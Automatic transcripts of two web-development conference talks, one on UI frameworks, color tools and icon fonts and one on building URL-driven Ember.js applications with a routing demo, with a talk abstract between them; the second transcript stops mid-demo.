colors. They work really well. I especially enjoy just sort of sensing how I feel when I scroll through the site. So there will be a beach scene or something like that and it will have some very nice light sirens and some peaces and so forth. I mean, I feel very relaxed. So if the website I'm trying to build is meant to relax people, I might take a look at that particular color scheme. The other option is Adobe Cooler, which is an app that's been around for a while. It will be recently re-released. It was a Flash app. It's now an HTML5 app. Cooler.adobe.com. I'll give people taking pictures a few seconds. All right. I have a quick demo that I wanted to show of Cooler. If I can ever go to the right side of my screen. So this is Cooler. It gives you a very large color wheel with which to start. You can actually look at other people's color schemes that they've already created by going to explore here. These aren't necessarily sorted by default. It's just sort of whatever happens to be shown here. So there's some that I probably wouldn't recommend. This one doesn't really come across to me as all that awesome. On the other hand, this seems like a really great group of colors right there. But of course, you can create your own. And you can do so by manipulating these little drag handles. Cooler uses some basic color theory techniques like certain colors at different positions on the wheel look well together. And so you can kind of drag things around and see how those manipulate. So we have kind of a nice pastel pattern right now that we've generated in sort of a rainbow scheme a little bit. Really, really great. Again, HTML5. One more thing that I wanted to show is actually this little notice right here. It's going to be impossible to see for you guys. But I'm going to do it anyway. And that is there's a cooler app for the phone. And so you can just hold it up to a picture and it will detect the colors that are shown in that camera picture and give you a little color scheme here. You can upload this to your cooler account and have it available. So if you just happen to be out and about, you guys have some amazing scenery here in Norway, just hold it up against a fjord or something, take a picture. It'll be synchronized to your cooler account and then you can build a website based off of those colors. The app is free. So go out and grab it. And then this is a pretty awesome thing as well. So let's talk about icons next. I love icons and symbols of all kinds. I love them. There's such a concise way of communicating information, especially to people that have been using your software for a while. Road signs are an amazing example of this. Everybody knows what a road sign means because they've been exposed to it for quite a bit. So you can extend this to software and things that people are used to, like the floppy disk for a save icon, can become relatively ubiquitous and you don't have to explain when you click this button, the page is going to be persisted in some sort of data store. Maybe database, maybe the cloud, what have you. You don't need to explain that to people because they've been exposed to the floppy disk icon for so long. But icons have a couple of disadvantages right now in web. For one, you have to design them typically. You have to serve them up from a website. Sometimes this means multiple requests. I have a high DPI screen. This is a retina MacBook Pro. So I can tell if people haven't created high resolution icons because they look kind of blurry. But there's a solution to this. It came from a kind of an unexpected place. Here's a particular character. Probably I'll recognize this character, use it fairly frequently. But what makes this recognizable? Well, the shapes, basically. It's sort of the letter form of an A with a circle over it if you want to get the sort of American dumbed down version. This is the same thing. I can recognize this. This isn't a character in my language, but I still recognize it as the same character as the last one. This is a different typeface. This is book Antiqua. The last one was Helvetica. We can go a little bit crazier. Here's the much maligned comic sans again. Same thing. I can recognize this. Sure, no problem. But what makes this the letter that it is, is the context in which it's seen. There's, if you see this in a word or a sentence, you know that's what that means. You can pronounce it a particular way. Say the correct word in the correct version. But it's all about that context. Say we changed that context. So, for example, you just saw this on a slide with nothing else next to it. Maybe it was rotated nine degrees. Maybe it was pointed downward. Doesn't necessarily mean exactly the same thing. And so with this in mind, some people created some fonts that do the same thing. There's nothing particularly contextually appropriate about that icon. It could very well be that particular character. So in the typeface, instead of putting the letter A with a circle over it, let's put a light bulb. Why not? And you can use these in just like you would in any other typeface. So we've already discussed the typekit stuff. You can use these icons. In fact, all four of these, this is text. Believe it or not. It just so happens these four icons actually come from parts of the Unicode standard that aren't standard characters. So you're not going to replace the standard alphabet with them. But they exist in this typeface. And you can download it. And you can type with a keyboard if you know what codes to use. And these colors will appear for you. This is a concept called icon fonts. Does anyone here use icon fonts already? A few? Okay, cool. If you're not, hopefully I will convince you that it's a really cool thing to use. I mentioned some of the detriments of regular icons. Some benefits of icon fonts specifically are that they're a single HTTP request. So you download an entire typeface that has potentially hundreds of icons in it. You can scale them because they're vectors, just like text is vectors. I can go into Keynote and make this text considerably larger. It's not going to look fuzzy because that's the virtue of it being a typeface. And as long as you're working within the same font family for this stuff, they're visually consistent. And we'll see what that looks like in just a moment. But before we do, I just want to have a slight word of caution. Use these judiciously. Don't overdo it. You can't have too many fonts, icons on your page. So many that it's confusing for someone and they don't exactly know what to click when. And make sure that you choose them for their meaning, not their appearance. And I mean something like this. I love this icon. This is probably my favorite icon in the set. It's cute. It's got a lot of personality to it. It's a little sciency, kind of geeky. It's great. But if I were to use this in a web application, what would it mean? Unless I was building a chemistry app, it's anybody's guess what this could be. This icon, for example, it's kind of become somewhat ubiquitous as the settings icon. So you tap this, you're going to change some configuration options of whatever app you're working for, working with. So with that in mind, make sure that when you're choosing these icons, make sure that they're actually meaningful to your users and not just cute little beakers and stuff like that. So three of the icon collections that I found most useful are Fontosm, which is designed to work with Twitter Bootstrap. Yes, but it works without it as well, no problem. Type icons or tip icons and then line cons. The line cons is actually where the icons in this presentation came from. And all of those have some public repos or public URLs you can go to. However, there's some better ones. And we'll see what this means in just a moment. Fontelo and IcoMoon are a couple of websites that I highly recommend you visit. And I will show you why right now because they actually contain a number of different fonts, icon fonts. It is really tough typing on this tiny little screen. Here we go. Okay. So IcoMoon is an online app that also includes a specific collection of icons called the IcoMoon set. These are free. Others are for pay, so you'll have to drop some money on those. Most of these are relatively affordable. It's not going to be anything crazy. The idea behind this is that just like Twitter Bootstrap has way more than you'll ever need, chances are these have way more than you'll need to. And so if you want to, you can come in here and just pick a few of these icons, only the ones that you might need for your application, and then you can download them as a custom font file that will only include in this particular instance these six glyphs. This is significantly smaller than downloading the entire collection of icons for this font. Fontello does the same thing. I tend to prefer IcoMoon because it has a lot more sets that you can include. So here's Font Awesome. This one is, what is that one in typo? There's a lot more down here. You can just keep scrolling and see many of these and you can add them in. These two are the not free ones from IcoMoon. This one is the free one from IcoMoon. You just sort of add, you can look at that one, but add it to your collection if you wish. And once that's done, I now have the ability to scroll down and actually look at, so I do in typo, I do do in typo. Actually look at all the typefaces that are in typo. This is kind of where I said be careful about the types, the icons that you choose because if you choose them from two dramatically different sets, it's going to be very obvious that they came from different sets, but things are going to just look a little bit off to your users. They won't be able to say, wait a minute, they used two different icon font sets, but they will say, maybe not even consciously, these look a little bit weird next to each other. Fortunately, a lot of these sets have a ton of icons. IcoMoon I think has another 200% on top of the ones that are already shown here if my math is right. So there's a number of these. You don't necessarily have to go all kinds of crazy places to find different icons. Definitely check these out. I really like this concept. It's worked out very well for us at Headspring. We use icon fonts and practically every single project that we have. So to kind of review what we've discussed today, we looked at a number of different frameworks and how they can fit different needs. We took a look at the comprehensive ones like Twitter Bootstrap that do practically everything for you. Very specific ones like Skeleton that only solve one or two individual problems and then rely on you to do the rest. And then select them somewhere in the middle so that you can kind of balance and pick and choose whichever ones you're looking at. We also talked about the a la carte ones which I personally think are still the future. We're going to start seeing a lot more of this modular download concept where you say, I just need to do forms. I don't have any tables in my app so I don't need those CSS styles. That's a waste from my particular application. And we also talked about how to augment these defaults with fonts from services like Typekit and Google Web Fonts, colors from Adobe Cooler and Design Seeds and Color Lovers which is the third one that I don't think I mentioned to you guys. Which doesn't, it's a little bit more of a community involved crowd source type of list but there's a lot of great selections there and that is Color with AU, not without. And we also took a look at some icons and some icon fonts that you can use so you don't have to serve up a lot of different HTTP requests but still get this neat symbology concept in your web applications. So thank you very much for your time. It's been great talking to you guys today. If you have any questions, I think we have a few minutes left. Please.
|
You and your team have unit-tested, continuously-integrated, and overall maintainably-crafted a great Web application. To match the rock-solid foundation underneath, why not give your site the visual polish it deserves? In this talk, you'll be introduced to several UI-focused frameworks to help give your functional site a facelift. You'll also learn about some easy ways to spruce up your UI with Web fonts, icons, and colors. Come learn how to take your site from maintainable to magnificent...no design expertise required!
|
10.5446/51520 (DOI)
|
So, you test this on? All right, shall we get started? Is everyone ready? Well, thank you guys so much for making it. I'm glad that I could be one of the first to welcome you to NDC. But seriously, thank you guys for making that the last session. I know that three-day conferences can be especially grueling, so I really appreciate it. Today, I'm going to be talking to you about building URL-driven apps, specifically JavaScript, client-side web applications. My name's Tom. I work on a framework, a JavaScript framework called EmberJS, so that's kind of the lens that I'll be viewing this talk through today, so that's what we'll be talking about a little bit. This actually is my first time in Norway. I put out this tweet yesterday, which was apparently a little bit of a hot button, because it's actually got retweeted 132 times. It's like one of the most viral tweets I've ever seen. Okay, so apparently this is like a really controversial subject that hit a lot of people. But then someone replied to this, and they said, that's why college is free in Norway. Beer is expensive, college is free, so I'll take this as an invitation to send my kids to Norway for their college education. So thank you guys for subsidizing that. So there's a couple of things I want to talk to today. This is basically the outline for my talk. The first thing I want to talk about is just the state of web browsers today. Then I want to talk a little bit about URLs, which I think is really, if you have a takeaway from this talk, it's URLs and basically how they are the UI of the web and how so many people today are breaking that UI by not really thinking about this as they're trying to move more of their logic from the server to the client. And then I'll give you guys a demo of basically building a small application using Ember that thinks URLs first. And then lastly I'll strap up and talk a little bit about the future of the browser and where I think things are going and how Ember plays a role in that. So the first thing I just want to say is that browsers are getting more powerful all of the time, right? So if you think about the way the web browser started, it was basically this document viewer, you could annotate text, and of course the key thing was that you had these, it was hypertext, right? You had these URLs. So from one document you could link to many other different types of documents. But over time it's kind of evolved to be more of an application runtime than a document viewer. So this is a screenshot, this is the Chrome experiments website where they basically show these demos that really flex the power of these new features that are coming to the browser. Firefox has also got one, sorry, Mozilla has also got one. I think theirs is probably the best design. Again, this is basically them just showing off features like web workers and mobile APIs like you can access the camera, etc. And even Microsoft is getting in the game, right? Like, I know this is a very Microsoft sympathetic conference, but when I primarily speak to a lot of web developers who are like Rails developers, no developers, and there's a sense of Microsoft being kind of a monolith that doesn't really get it. But the more I talk to the IE team, the more I think, wow, these guys are really embracing the web. They've got, I think this is really neat, they've got a website where you can actually download plugins for IE that let you try out some of these features before they've landed everywhere. So the point here is that there's a lot, a lot of new features coming that are turning the browser from simply a document viewer that you can spice up with a little JavaScript into a really powerful application runtime. But when I go out and I talk to developers, a common refrain that I hear is like, yeah, you know, that's cool. There's always new features, WebGL, web workers, WebSockets, all these things sound cool in theory, but when are we going to get it, right? People have this intuitive sense of the standards process being very slow of browser adoption, being very slow, and you can't really rely on it, which is why I think a lot of people are attracted to native, right? Because basically every year you get a ton of great new features, you can do stuff that delights your users. But I think the most important thing is, do you guys know what an evergreen browser is? Has anyone heard this term of an evergreen browser? So the idea of an evergreen browser is simply one that updates itself without prompting the user. Basically every time you open it checks to see if there's a new version, and if there is a new version it basically installs itself. It doesn't go about prompting you. I don't know if your parents are like my parents, but the second they see an update they're like, no way, are you kidding me? Like this thing has been working fine for years. I do not need your new crappy browser. Just leave me alone. So the fact that it's not something that you have to prompt, it's something that just happens. And I think Chrome is the prime example of this, right? So think about if you're developing a feature, you don't really worry about like, oh, does that version of Chrome support that feature? You don't even really think about it, right? You basically fire up Chrome on your computer, you test it out, and if it works you're like, cool, we can use it, right? Because for most people you can assume that every user has an updated version of Chrome. Now, I think Chrome really pushed the envelope here, but the next generation of browsers are all evergreen. And that means IE 10, Firefox, Chrome, the only thing really left is Safari, which fortunately does not have the biggest market share anymore except the mobile devices. So that's definitely still something to be worried about. But the thing to keep in mind here is that not just that progress is being made, but the progress of progress is increasing, right? It's like the second order increase. So this is a quote from a book that I really liked by Ray Kurzweil called The Singularity is Near. And the idea here is that human progress is kind of increasing at a similar pace. So our intuition, our gut feeling about the pace of change has to do with linear improvement. But in fact, as things start updating themselves, you actually see this exponential increase. And I think that's going to start happening to the web platform to the point where it's actually possibly even going to be innovating at a faster pace than native. And I think that's really, really exciting. So don't think, you know, these new features are never going to arrive. It's time to start thinking about this stuff now because it's going to be here a lot sooner than you think. Evergreen browsers are a total game changer. And I just want to show you a quick example of this. My friends at Mozilla have been working on this project called AsmJS, which is basically a way of getting near native performance in the browser. So I just want to say, you know, this is not a souped up. This is not the brand new MacBook here. This is actually three generations old, pretty wimpy computer. But this is actually running in my browser. So let me fire up a demo. I think this is incredibly impressive. This is basically the Unreal Engine compiled and running in Firefox. And you can see it's actually running at native speeds. It's beautiful. You have this gloss, you have this reflection, and it's all inside of a browser, right? So it's not just that it's fast. It's that you inherit the entire security model of the browser. So you can basically visit a web page, download and run arbitrary code at native speed. That is a total game changer. And I think it's time, so obviously we're not all game developers, but there's a ton of stuff in this class that we can start thinking about how we're going to incorporate this into our applications. So you can check this out, unrealengine.com.slashhtml5. It's actually really new. What it's doing, Firefox is actually ahead of time compiling this JavaScript into native code that it can basically guarantee is safe. So that's pretty cool. Now I can quit Firefox and not have my MacBook Air fans go full throttle. So again, I think a lot of people, when they think about web applications, there's this notion that basically every request is going to go load a new page, right? So basically as a user interacts with your application, it's constantly hitting the server and getting HTML back in some form. Maybe it's a full page, maybe you're doing Ajax, but at the end of the day, I think most people think about the browser as mostly document viewer. And slowly over the past, I would say one or two years, more and more people have been thinking about building a single page application, right? But by and large, most web applications today, every time you move between pages, you're going to the server and you're requesting a new page. But the way that I would like you to think about your JavaScript web applications, sorry, your web applications in general, now that the browser, you can see it's actually starting to meet parity with the runtimes that you'd expect on mobile devices or on the desktop. So what I want you to start thinking about your applications is simply appear in this kind of layer where we have these different applications, maybe ones on desktop, ones on mobile. The browser is just a third platform you support and they're all consuming the same API. They're still all talking to the server using the same JSON API. Now, I say that and a lot of people object. They say, well, you know, browsers are slow. And, you know, if you want to write something like this where all the rendering and all the behavior and the logic all happens in the client, they say that's, you know, that's a JavaScript heavy application. I don't want to write a JavaScript heavy application because it would be slow and hard to manage. And my response to that is, okay, so here's on the left hand side, I have the New York Times, which is kind of like the classic, you know, you think about like, what is a web browser? How does it start? It started as these hyperlinked documents, right? And so a newspaper, I think, really captures the idea of what people think about when they think about these traditional document-oriented websites. And then on the right hand side is some forum software, open source forum software called Discourse. It's written in EmberJS on the front end and it's running Rails on the back end. 100% all of the rendering is happening in JavaScript. So a lot of people would think of something like this as a JavaScript heavy application. But you know, we went to look and the difference between these two, if you look on the right here is the Discourse app or on your right and then over here on the left is the Chrome inspector showing all the JavaScript assets. You can see not only are there a lot more files on the New York Times, but the raw JavaScript payload of the New York Times is 802 kilobytes compared to a heavy JavaScript app like Discourse, which is only 284. Now this is not to knock the New York Times, certainly not doing anything wrong. It's a great experience. The point that I would just like to make is websites that you visit every day are loading a lot more JavaScript than you think they are. They're doing it in a very ad hoc way, which means it starts to really add up. And basically if you want to deliver a good, compelling experience to your users, you're just going to have to end up using a lot of JavaScript. It doesn't really matter how you model it. It's going to be JavaScript no matter what. So you might as well embrace that. You might as well try to stop fighting the fact that you have JavaScript in your web applications and start trying to think, okay, well, is there a holistic model that I can use to manage all this so it happens in the same way? I'm not sprinkling JavaScript on top of my HTML until all of a sudden I have a created 800 kilobytes. So I think the most important differentiator here is not whether it's JavaScript heavy, but whether or not it's long lived or not. So on a typical document-oriented site, every time you click a link, basically everything gets thrown away and it gets rebuilt when the new page loads. But with a single-page app, these long-lived applications, thinking about how you manage state is actually really important. Now, I want to talk about URLs. URLs are really the UI of the web. And they're how we share. They're how we collaborate. And one actual nice side effect of doing server-side rendering, things like ASP.net, MVC, Ruby on Rails, even PHP is ahead of time you have to think about URLs, right? Because there's no way for your user to reach your application if you don't think about them. So especially if something like Rails, the first thing you do when you start building your application is you define your resources, which defines your URLs. But most JavaScript frameworks that are designed to build these single-page applications have actually completely forgot about these URLs. So how many of you are familiar with To Do MVC? Has anyone seen this web page before? So To Do MVC basically just re-implemented this little To Do app using all the different popular JavaScript frameworks. I think there's around two or three million of them. So they implemented this to application across all of these. But if you take a close look, this R next to each of the names of these different libraries indicates that it has routing support. What that means is that even thinking about URLs was not a consideration until later someone's like, oh, crap, you actually want to be able to share this with your friends. You want to be able to bookmark it. So I don't want you to think about routing as an afterthought. URLs are actually really critical, right? So JavaScript frameworks are treating this as something you just kind of like tack on at the end, like, okay, we built our application, now let's just sprinkle some URLs on it and call it a day. But in fact, if you look at real polished JavaScript heavy applications like Discourse, another example, it's forum software written in Ember. Even Facebook, which has a lot of JavaScript driving the interactions. Twitter is a good example. Basically every page on Twitter has a unique URL. The Ardio is a backbone app. All of these things have very good URL support because your users demand it. And you've probably noticed this, you've probably been using the web, you're using a lot more JavaScript stuff, you've probably had this innate feeling of like, wow, the back button is broken, refresh is broken. And a lot of people think, well, are URLs really that important? Do I really need them in my application? But here's what I want you to do. Go look at your Twitter feed. I guarantee you look at 10, look at 20 tweets in your timeline. Almost all of them are going to have URLs in them, right? Like that whole point of something like Twitter is that we want to share what we're reading and what we're doing with friends and people that we want to influence. So the URL is the UI of the web. It's basically how we collaborate. It's how we share. You know, I went to go look at my email inbox and something like 80% of the emails I looked at all contained a URL. It's a lot more pervasive than you think because you're so accustomed to it. And it's really important not to break that. The web, I think, won over native on the desktop because bookmarking, sharing, emailing, being able to command click and open a new tab, these are all very important things that you just don't have in a native experience. And I want to go a little bit farther and make a pretty bold claim, but I stand by it. If your app doesn't have URLs, you are not a web developer. A lot of people think I'm a web developer because I use HTML and CSS and JavaScript. But that doesn't matter at all. The thing that makes a web app a web app is the URL. If you don't have good URL support in your application, it's literally no different than just putting an EXE on an HTTP server and having your user download it, right? Because it's not shareable. It's impenetrable to the outside world. There's a problem, though, and that is even if you do get URLs right, if you think that URL is important, it's hard to get them right. And a lot of people say, well, you know, do I even need URLs? Even some famous screencast authors who record screencast about Angular, I'm referring to Rob Connery, who's in the audience today. I was watching his tech pub on Angular, which was really, really great. It was very well done. But then in the end, he said something that made my jaw drop. He said, you know, do you really need a URL? You should really think about it, right? You think about, does my application really need it? And if it does, then we can go in and Angular and we can add a router and add different URLs. But I would argue that the onus is on you to prove that you don't need URLs. Think about all the unusual places. Here's a couple of examples. Imagine if I want to play a game with my friend, I want to play StarCraft. Instead of logging into battle.net and finding their names, searching to see, inviting them to a group, imagine if I could just, I am them a URL when they clicked it, it just, boom, took them into a game with me. Or how about this? How many Gmail users? Any Gmail users in the audience? Okay. So imagine you and I work together and we both get an email from the accountant. In a couple of weeks past, of course, you have a lot of stuff in your email, your inbox, you don't see it. How many times has this happened? You get an IM from your coworker. Hey, did you see the email from the accountant? No, I didn't. Yeah, search for the title of update. And it was sometime in January, right? There's no way for me to share an email with you. You have to go through this crazy process of hoping that there's a unique subject that you can type into the search field and find it. This happens to me all the time. Imagine if instead, Google Gmail could say, oh, I see that you're both CC'd on this email, let me just generate a URL and then I can send it to you, you click on it, it takes you directly to email. The fact that you can't do that's really, really frustrating. I think another good example is in Chrome. If you've looked at the settings panel in Chrome, all of these different panels have unique URLs. So as you go around the settings in Chrome, the URL actually updates. And you might think, well, that's not actually that useful. But it turns out it is because if my dad calls me and he's like, hey, how do I reset my cookies? How do I clear my cookies in Chrome? I don't have to say, go to the Chrome menu and then, you know, go to preferences. Oh, wait, you're on Windows. Actually, it's completely different UI. So let me try to remember how you get to it in Windows. Instead, I just send him a URL, he clicks on it and takes it right to the page where he can clear his cookies. So again, I just want to reiterate, the onus is on you to prove that URLs are completely useless to your application. And I think that if you really think about it, most things, it's very important to get this right. In fact, so important, you know, I almost missed my talk today because I went to go look at the schedule. Oh, there I am, okay, 420. Let me just go look at this other link. Actually, let me go back at what happened, it's gone. The back button is busted because the agenda is a JavaScript web application that doesn't actually remember where it was. So it completely breaks the expected behavior of the browser. When I click the back button, I want to see the thing that I just looked at. So in fact, this is one of several very common error scenarios that you run into when you're browsing the web. So my buddy, Ryan Florence, who works at Instructure, been helping us out with Ember. He gave a talk where he actually identified and named several different failure scenarios where people are just not thinking about this through all the way. So I'd like to go through some of these examples with you. The first one, Ryan calls the ticket. So the ticket is, okay, I'm using this as an Angular app for finding videos. So we're going to go find this video. Oh, this is a cool video. This looks good. Let me share this with my friend. Let me grab the URL out of the URL bar as I'm used to doing here. I'll refresh a bit. Oh, damn it, it's gone. Actually, there is a way to get the URL, but you have to know the secret, you need to know the secret ticket vendor to get your ticket back to this page. Oh, here it is down at the bottom, copying link. Oh, now it works. Okay. Okay, when we know the secret incantation to get the URL, now we can get the ticket back to this page. But of course, this is not the UI of the web. The UI of the web, the thing that you're used to is going to a page, going to the address bar and copying it, bookmarking it. This ticket vendor system completely breaks the entire flow. This next one is called the back door. This is Pinterest, which may be some of you, this is actually a backbone app. Okay, we're browsing Pinterest. Oh, I see a cool photo that I like. Awesome. Let me take this URL and send it to a friend. I'll simulate that by reloading. Actually, totally different page, completely different UI now. And now the back button is completely broken. Try to go back to where I was. Nothing works at all. You're just completely host. Okay, so that seems bad. Reload the page. All right. Well, that's bad. This next one, I know what you're thinking. You're like, okay, well, you know, these yahoo is at Pinterest. They don't know how to build this. Surely the guys who are actually spending time thinking about JavaScript frameworks get this right all the time. Here is an excerpt from the AngularJS website. This is the built with Angular. We're going to go take a look at a demo app. Okay, opens a modal. Looks good. Let's refresh the page to see if sending it to a friend works. Pops up. Looks good. Oh, damn it. Looks like we have a little bit of a race condition there where some data is popping in the background after the modal has rendered causing it to do the completely wrong thing. Do I have anyone here from a big family? Any middle children? Not the oldest. You're not the youngest. You're in the middle. It's easy to get overlooked, isn't it? You know, everyone else gets the attention and you're just kind of hanging out, minding your own business. This is 37 Signals Basecamp, which actually has really good URL support. It's not actually a JavaScript app. It's all rendered on the server except for the accounts page. Most people don't go here, so it didn't get as much love as the other pages. Now if we reload this page and we go back, nope. Not happening. Nope. Everything is actually completely hosed now. Someone forgot to check whether URLs worked on the accounts page because whoever goes there. So now we're in this really weird state. Maybe it's going to, oh, okay, something's happening. All right. Good. Well, you can see that even if we're not doing client-side rendering, even if we're still doing a lot of server-side rendering, even just adding JavaScript on top can cause these URLs to break. Here's the last one. This is my favorite. This actually has two different names. For the Americans, this is the Tootsie Pop. As in how many Lix does it take to get to the center of the Tootsie Pop? I realize that this is a reference that no one else would get. So we changed this to the Overzealous Hansel and Gretel, leaving a little bit too many breadcrumbs behind them. So this is an Angular app. This is a movie search. So basically what you can do is you can search for titles, and I think the search is like IMDB. So you'll notice that as you type the name of the movie, the URL bar actually updates. Awesome. This is great because that's what it should be doing. It said, oh, now we hit the back button, and it looks like for every character I typed, there's a URL, but of course it's not updating. That's not good. Okay, okay. So that's the Hansel and Gretel. It's a little bit overzealous in leaving the breadcrumb trail behind it. So I want to be clear about something. The point of me saying this is not to bag on these people because I've broken the back button. I've broken refresh. How many of you have written a JavaScript app? How many of you have broken the back button before? That's basically everyone. Okay. This stuff is really hard. These people aren't idiots. These people are really freaking smart. This stuff is really hard, and the thing that you need is basically a single code path to guarantee that if you're making changes in your application, those changes are being reflected in the URL, and if you come back through the URL, basically that same code path is followed no matter what. So I think that's basically what we've done in Ember, is we basically, the first version, we had very bad URLs, we didn't actually have any routing, and we ran into all these problems and we said, you know what, this is just not acceptable. We need to go back to square one and rethink this entire API because we're doing a very bad thing and we're helping people break URLs. So we went back to the drawing board, we had a router version two, and I think we've nailed it. We've done a lot of important work that makes you think about URLs first. Basically, URLs get put front and center. You're always thinking about them. It's actually harder to write an Ember app without URLs than it's writing one with URLs, and I think that's important. So I just want to thank you guys for the process of building a small Ember app. Just before I do that, I just want to go through a couple of the core key concepts that might be a little bit foreign to you, but they're actually very simple, and these are actually the things that let us do what we do in terms of URLs. So the first thing I want to share with you, these are all hand drawn by the way, you'll soon see why I am an engineer and not an artist. So the first concept is that these, is basically templates are mapped to URLs. So basically every time you have a URL, that URL has a unique template associated with it. So in this case, we have posts. The posts URL is linked to the post template, and the comments URL is linked to the comments template. You can see a pattern here. Now, an individual template is linked to a model. And so in your template, when you ask for a property, you basically have some kind of dynamic property, it goes and it gets that from its model. Now, you might be wondering, well, how does the template know which model is backing it? And we actually have a separate object in the system called a route. And the route is responsible for basically connecting a template to a model. It's basically a very small configuration object that says, hey, I know, we have this template. And here is the JavaScript object that should be pulling its properties from. And then lastly, and I think most importantly, this whole system, what you see right here, can be nested as deeply as possible, or sorry, as deeply as you would like. So in this example, we have a post template. And that's connected to the post model. But then inside of it, we say, well, actually, we have this different area of the template that's powered by an entirely different model. And the way that we do that is a system we call outlets. So the way to think about an outlet is simply as like a region on the screen that has a different template powered by a different model inside of it. And again, you can have as many of these inside of a template as you want. And each of those can itself have a nested outlet inside of it. So it can go as deep as you want. And then this is just showing right here this URL. Basically, the way that Ember works is it starts at the left of the URL. It gets the first chunk and says, okay, let me render this template. Okay, now that I've rendered that, let me render the next step into the parent. And so you can see that this decomposes recursively all the way down. All right, so I'm going to build a small application for you guys here. This is basically a markdown editor. Now, can you guys see this? Okay, is this text big enough? Cool. I guess I should probably open some code before I ask you if it's big enough. Okay, so this is basically the Ember.js starter kit. So if you visit ember.js.com, you'll see a link to download the starter kits, basically an HTML file with some JavaScript and all the dependencies ready to go for you. I've only made one small change here. The first is that we're using, sorry, a couple small changes. The first is that we're using a Twitter Bootstrap CSS. So it'll have a little bit nice styling built in. I'm including a markdown JavaScript library, you will see in a second why this is cool. And why it's useful. And then the last thing is I've actually just provided some fixture data here. So if I open this fixtures.js file, you'll see that I just have a global variable called files. This is an array of JavaScript objects. And then right below that I just have a loop that indexes each of those objects by ID. And in a little bit, I'll go into why this is, why this is important. Okay, let me open this up in Chrome so you guys can see. Okay. Okay, so basically we're starting from a completely blank slate. So the first thing I want to do is let's just get an application on screen. So we're not going to do anything fancy. Let's just get Ember template rendering. So the way that we do this is I'm going to go to the body tag here in my HTML. And I'm going to create a new script tag. And the type is text slash x handlebars that basically just tells the browser, hey, don't treat this as JavaScript. And then let's just put a header inside of it. Okay. Now we need to tell, we need to basically tell Ember, hey, I want you to take control of this page and I want you to start rendering templates. So the one last thing that we have to do just to get this template on screen is if I switch to our app.js file, I just have to create an instance of an application. And typically that's assigned to a global variable. So I'll just say like window.app equals ember.application.create. And now if we reload this page, you can see that without us writing any code other than creating this application, it automatically went, found this first handlebars template and rendered it to the screen. Okay. So that's cool but obviously not super impressive. So the next step is let's make stuff a little bit dynamic. Now I know one complaint people have about backbone is they're like, you know, if I want to take some value over here and move it over here, I have to write all this imperative code. But Ember like Angular makes it really easy to bind two values together in the DOM without having to write any code. So let's take a look at what that looks like. How many people here have used either Angular or Knockout? Okay. Awesome. So the thing I'm going to show you is going to look fairly similar. The most important thing to realize here is that instead of us using attributes and elements to indicate binding, we actually replace basically the brackets from HTML with double curlies. And that's basically what you're going to look for instead of looking for ng- or one of the knockout bindings. Just look for curlies instead of brackets to indicate that it's bound. So the first thing I'm going to do here is I'm going to say markdown files by name. If we don't specify a model, Ember will actually create an empty object for us for the model. So we'll rely on that behavior for just a second. And then I'm just going to make a text field that we can bind to. So I'm going to say this is basically an input tag with type of text. And the value I'm going to bind to the name property. So it's basically the same thing that we saw right down below. So we have name here and we have name here. So these values are now bound together. So now if I refresh the page, I should be able to put my name in here. And you can see as I type, it's actually live updating without having to write any code. So I think this is pretty neat. Okay. So that's pretty interesting, but obviously I just spent a lot of time talking up URLs and so far all we've seen is two elements talking to each other. So I think the point of me demonstrating this is just to show you, like, hey, this data binding thing, it's very easy, it's very simple, this is what all the other frameworks have. So we're competitive, it's just as easy, but I'm about to show you what the real magic lies. So the first thing that I want to do on our application is actually show a list of files. So this is basically a markdown editor. And in our markdown editor, we're just going to have a list of these files. They're basically blog posts. So there's like a title and then a body. So the first thing I do when I'm defining a feature in an Ember application is to think, okay, what is the URL that's going to be associated with this? So basically what I want to happen is that if the user comes in and they visit slash files, I want to show them a list of the files that they have in their system. And just as a reminder in our fixtures.js file, this is basically the list of files that we want to display. So how do we do this? Well, the first thing is we're going to create a router. And if you're familiar with server side MVC, this should look fairly familiar to you. It's basically a way of defining these URLs. So we'll say app.router.map and this takes a function. And we'll say this.resource files. Now, let me fix my typo. So this is not a lot of code, but it's actually doing a lot of stuff under the hood. The most important of which is that if we go back to our index.html file, we can now create a script tag. So we'll say script type text x handlebars. And we're going to give this template the same name as we did in our router. Let me open that up so you can see it side by side. So over here we have our file's resource. We're just going to create another script tag and we're going to give it the ID of files. And then inside of here, let's just put a just a placeholder value for right now just so that we can see that it's working. Okay, so now if I go and refresh the page in Chrome, nothing's going to show up. Do you know why? Well, the immediate answer is that we haven't actually visited the URL that we just defined. So just because I don't have a server running, I'm going to use a hash URL, but obviously in production if you were using a more modern browser, you'd use the push state API. So visit slash files. And still nothing happens. So the reason for this is that if you recall from the slideshow, we have this concept called an outlet. So an outlet again is just a placeholder in the DOM that another template gets rendered into. And we haven't yet told ember, okay, you're rendering this files template, where does it actually get rendered into? So to do that, I'm just going to go back to my HTML file and in this initial template that we defined, I'm just going to put a outlet and we do that just curly, curly outlets as a basically a handlebars helper. Now if we go to Chrome and refresh, you can see, let me make this a little bit bigger, you can see that it's now rendering the files template into here. And if we hit the back button, you can see it goes away, we go forward, and it's rendering, right? So does that make sense? Basically we define this URL, and it's automatically rendering the template of the same name when we visit that into the outlet. So that's cool, but obviously this is not really dynamic, right? What we have is an array of blog posts, of markdown files that we want to render a list of. So if you recall, I said that a template gets its model assigned to it by this route object. Now instead of writing a bunch of imperative code that stitches all these objects together, we just rely on the fact that if you want to have a understandable application, you typically want to name things that are related the same. So if we have a resource named files, and we have a template named files, you can guess that if we have a route object named files, then it will basically be the configuration for those two things, and that allows us to not write a lot of imperative code. So we'll say app.files route equals ember.route.extend. So we're basically just defining a very small object here, and this object has a hook on it called model. This is just a function that gets invoked when the template needs a model, and any value that you return to this will be passed into the template. So if you recall, I have this global called files, I'm just going to return that from the model hook. Now in the interest of time, I have prepared a handlebars template that we're actually going to use for this. So let me replace this placeholder, and I'll just paste this in here. And just to walk you through what's going on, we basically have a div. This is like pretty standard HTML marked up annotated to be styled by Twitter Bootstrap. And the most important thing here is that we have a table, we have a TR, and then we use this each helper. So this is a helper that's built in the handlebars that basically says for each item in an array, loop over it and repeat the contents inside. So in this case, we have a TR element that's linked over. Let me just delete this link too, because that's going to blow up. So basically we're saying loop over all of the files that are in the model, which is an array, and print the title, and then print the author. Okay, now if we refresh, okay, awesome, it's actually working. So basically we have this files array, we're returning that from the model hook, and now this pound each is letting us loop over it and repeat a TR for each item that's inside of it. And again, that URL is staying updated. If we click the back button, you can see it goes away, we click forward, it shows up, we click refresh, everything works as we would expect. So this is actually awesome so far. But now what we want to do is we want to generate some dynamic links, right? We want to be 